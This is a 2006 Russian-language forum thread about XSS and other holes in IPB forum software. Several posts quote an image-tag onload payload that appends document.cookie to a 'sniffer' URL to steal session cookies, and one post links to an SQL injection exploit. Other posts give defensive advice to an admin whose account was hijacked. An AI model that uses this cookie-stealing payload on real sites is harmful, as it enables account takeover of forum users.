xRay Опубликовано 31 Июля 2006 Жалоба Поделиться Опубликовано 31 Июля 2006 вот тут [color*=[img*]http://aaa.aa/=`aaa.jpgпролезает картинка подменяем ее на снифак и усе Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 31 Июля 2006 Жалоба Поделиться Опубликовано 31 Июля 2006 ну и что так это тогда по твоей логике можно в любую запихнуть.На вон пихай:%D0%BF%D1%83%D1%82%D1%8C_%D0%BA_%D1%81%D0%BD%D0%B8%D1%84%D1%84%D0%B5%D1%80%D1%83чего сильно получается? Ссылка на комментарий Поделиться на других сайтах Прочее
xRay Опубликовано 31 Июля 2006 Жалоба Поделиться Опубликовано 31 Июля 2006 Да походу я слишком мнительный стал.сорьки Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 1 Августа 2006 Жалоба Поделиться Опубликовано 1 Августа 2006 Для возможности передачи куков через сниффер нужен ява-скрипт! Поэтому все киддисы пытаются сделать XSS аттаку таким образом, чтобы в html можно провести слово javascript и сделать его одним из аттрибутов любого html тега, чтобы инструкция, записанная в ява-скрипте, исполнилась автоматически при открытии топика (в ИЕ например). Если слово javascript не проведено внутрь страницы, то здесь хоть усрись, ничего не получится. Ссылка на комментарий Поделиться на других сайтах Прочее
Anna Опубликовано 1 Августа 2006 Жалоба Поделиться Опубликовано 1 Августа 2006 Как показала практика, использование слова javascript не обязательно. Достаточно внедрить картинку, выйти за ее кавычку, а там написать onload="this.src='снифер'+document.cookieи усе.... Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 1 Августа 2006 Жалоба Поделиться Опубликовано 1 Августа 2006 ну понятно, там есть несколько способов.В т.ч. и через <script>но всё-равно нужно выйти за пределы html тега. Кстати этот пример это что тег? Кинь в личку полный пример. Ссылка на комментарий Поделиться на других сайтах Прочее
xRay Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 Anna, SongДавайте тут продолжим:http://www.ibresource.ru/forums/index.php?...iew=getlastpost Ссылка на комментарий Поделиться на других сайтах Прочее
Akhashganga Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 Не знала куда поместить своё сообщение. У кого такое было пожалуйста отзовитесь. Вычислила - каким-то образом пользователь зашёл под моим именем, сменил себе имя с на Это я нашла в админ центре. Там высвечивались последние действия администратора - стояло моё имя и адрес этого пользователя. В админку я зашла под своим старым паролем. Сменила там себе пароль и так смогла зайти в форум. Обнаружила, что сменено моё время. Оно как раз совпадает со временем этого пользователя. Так как могло это произойти? Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 Ну сломали твой форум. И что тут нового? Ссылка на комментарий Поделиться на других сайтах Прочее
replicant Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 Как показала практика, использование слова javascript не обязательно. Достаточно внедрить картинку, выйти за ее кавычку, а там написать onload="this.src='снифер'+document.cookieи усе.... Весьма интересно, насколько реальна угроза от подобного куска кода и возможность его внедрения. OnLoad опасная штука. Ссылка на комментарий Поделиться на других сайтах Прочее
Akhashganga Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 Ну сломали твой форум. И что тут нового? Что защиты от взлома никакоi нет??? Забанила того пользователя. Ссылка на комментарий Поделиться на других сайтах Прочее
Anna Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 Как показала практика, использование слова javascript не обязательно. Достаточно внедрить картинку, выйти за ее кавычку, а там написать onload="this.src='снифер'+document.cookieи усе.... Весьма интересно, насколько реальна угроза от подобного куска кода и возможность его внедрения. OnLoad опасная штука. Нет, такой вариант в инвижне давно уже не прокатывает. Дырку в теге IMG закрыли сто лет назад еще в первой линейке кажется (когда кавычка пропускалась в урл картинки). Я просто привела пример того, что по сути не всегда нужно слово "javascript" для выполнения инъекции. Извините, если не в тему. П.С. onload работает только если у юзера включены в браузере картинки и яваскрипт. Ссылка на комментарий Поделиться на других сайтах Прочее
К.е.Н Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 Что защиты от взлома никакоi нет???Забанила того пользователя.Вот тебе защита 1 делай пароль как можно из боле цифр и букв2 Поищи на форуме шел.Может залили его тебе Ссылка на комментарий Поделиться на других сайтах Прочее
Akhashganga Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 Что защиты от взлома никакоi нет???Забанила того пользователя.Вот тебе защита 1 делай пароль как можно из боле цифр и букв2 Поищи на форуме шел.Может залили его тебе Опять взяли мой пароль.!!! Меня бомбят. Теперь забанила тот IP. Что такое шел.??? Но у меня ярые завистливые противники. С соседнего форума версии 1.3 Final. Я не знаю кого они на меня натравляют. И каким образом пароль то можно подобрать? Ссылка на комментарий Поделиться на других сайтах Прочее
SHiSH Опубликовано 2 Августа 2006 Жалоба Поделиться Опубликовано 2 Августа 2006 читать эту тему форума до просветления Ссылка на комментарий Поделиться на других сайтах Прочее
bettip Опубликовано 3 Августа 2006 Жалоба Поделиться Опубликовано 3 Августа 2006 Теперь забанила тот IP. Что такое шел.??? Но у меня ярые завистливые противники. С соседнего форума версии 1.3 Final. Я не знаю кого они на меня натравляют. И каким образом пароль то можно подобрать?айпишка скорее прокси, так что ее бан как мертвому припарка.пароль можно подобрать, но скорее всего ищи шел. что такое шел трудно так обяснить, если по простому, файлик со скриптом позволяющий просматривать твои файлы на хосте, базу данных, изменять данные. если не представляешь что это такое, то найти трудно.если на хосте в панеле есть функция антивиря, то прогони ее, может найдет, если нету, то тогда надо ковырять файлы форума. вообще если форум без наворотов, то есть простой вариан против шела, а так же есть еще вариант обезопасится от всего такого. Ссылка на комментарий Поделиться на других сайтах Прочее
Mokkey Опубликовано 3 Августа 2006 Жалоба Поделиться Опубликовано 3 Августа 2006 Эта SQL инъекция уже была? Для 2.0.4 _http://www.web-hack.ru/exploit/exploit.php?go=169 Ссылка на комментарий Поделиться на других сайтах Прочее
replicant Опубликовано 4 Августа 2006 Жалоба Поделиться Опубликовано 4 Августа 2006 Эта SQL инъекция уже была? Для 2.0.4 _http://www.web-hack.ru/exploit/exploit.php?go=169 Вроде бы да! Хотя даты там не стоит, но подобное вряд ли осталось бы надолго без внимания. Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 4 Августа 2006 Жалоба Поделиться Опубликовано 4 Августа 2006 Да это вообще старье. Это autologin Ссылка на комментарий Поделиться на других сайтах Прочее
tarantas Опубликовано 4 Августа 2006 Жалоба Поделиться Опубликовано 4 Августа 2006 Что защиты от взлома никакоi нет???Забанила того пользователя.Вот тебе защита 1 делай пароль как можно из боле цифр и букв2 Поищи на форуме шел.Может залили его тебе Опять взяли мой пароль.!!! Меня бомбят. Теперь забанила тот IP. Что такое шел.??? Но у меня ярые завистливые противники. С соседнего форума версии 1.3 Final. Я не знаю кого они на меня натравляют. И каким образом пароль то можно подобрать?1) Поставь .htaccess на админку.2) Уменьши длину и поставь более тщательную проверку ( браузер, ИП ) сессий. Ссылка на комментарий Поделиться на других сайтах Прочее
Rationa Опубликовано 5 Августа 2006 Жалоба Поделиться Опубликовано 5 Августа 2006 Уязвимость связанная с вложением тэгов в , , (Описание уязвимости)Уязвимы форумы: IPB версий 1.х.x и 2.0.х поставила этот патч. у меня версия 2.0.3.и у меня теперь при добавлении сообщения в расширенной форме исчезли смаслы и кодировки в сообщениях не заменяются на смайлы. что делать, не подскажете? Ссылка на комментарий Поделиться на других сайтах Прочее
SHiSH Опубликовано 5 Августа 2006 Жалоба Поделиться Опубликовано 5 Августа 2006 видно патч криво поставила Ссылка на комментарий Поделиться на других сайтах Прочее
Rationa Опубликовано 5 Августа 2006 Жалоба Поделиться Опубликовано 5 Августа 2006 видно патч криво поставилая все перепроверила. все должно быть верно. если конечно ошибка возникает из-за этого куска кода Ссылка на комментарий Поделиться на других сайтах Прочее
Marwy Опубликовано 9 Августа 2006 Жалоба Поделиться Опубликовано 9 Августа 2006 Вопрос был, но он исчерпан... Ссылка на комментарий Поделиться на других сайтах Прочее
dzembak Опубликовано 11 Августа 2006 Жалоба Поделиться Опубликовано 11 Августа 2006 за последние 3 недели заколебали хакерские атаки. Регулярно, каждый день, на разных форумах на базе IPB 2.1.3 появляются одни и те же сообщения рекламного характера. Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения